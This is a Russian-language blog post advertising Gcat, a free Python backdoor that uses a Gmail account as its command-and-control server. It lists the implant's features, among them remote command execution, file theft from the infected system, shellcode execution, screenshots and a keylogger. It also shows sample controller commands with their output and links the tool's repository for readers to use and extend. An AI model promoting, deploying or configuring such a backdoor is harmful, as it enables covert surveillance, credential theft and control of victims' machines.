GCAT бесплатный троян на Python.

Gcat — скрытный backdoor на Python, использующий Gmail в качестве C&C (command and control) сервера.
Для его работы требуется аккаунт на Gmail и включенная опция Allow less secure apps в настройках аккаунта.

Сам репозиторий содержит два файла:
• gcat.py — скрипт для перечисления доступных клиентов и передачи им команд;
• implant.py — непосредственно сам backdoor.
Там и там достаточно подправить переменные gmail_user и gmail_pwd.
Доступные команды на клиенте:
• выполнить команду;
• скачать файл с зараженной системы;
• выполнить отправленный шелл-код;
• получить скриншот;
• заблокировать экран клиента;
• запустить keylogger;
• остановить keylogger.
Пример запуска команды на клиенте:

# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-cmd ‘ipconfig /all’

[*] Command sent successfully with jobid: SH3C4gv
А затем просим результат для соответствующего ID и JobID:

# python gcat.py-id 90b2cd83-cb36-52de-84ee-99db6ff41a11-jobid SH3C4gv
DATE: ‘Tue, 09 Jun 2015 06:51:44 -0700 (PDT)’
JOBID: SH3C4gv
FG WINDOW: ‘Command Prompt - C:Python27python.exe implant.py’
CMD: ‘ipconfig /all’

А если тебе еще чего-то не хватает, то это можно с легкостью дописать.

URL: github.com/byt3bl33d3r/gcat
Система: Windows/Linux

Click to rate this post!
[Total: 9 Average: 3.3]

Специалист в области кибер-безопасности. Работал в ведущих компаниях занимающихся защитой и аналитикой компьютерных угроз. Цель данного блога - простым языком рассказать о сложных моментах защиты IT инфраструктур и сетей.

Leave a reply:

Your email address will not be published.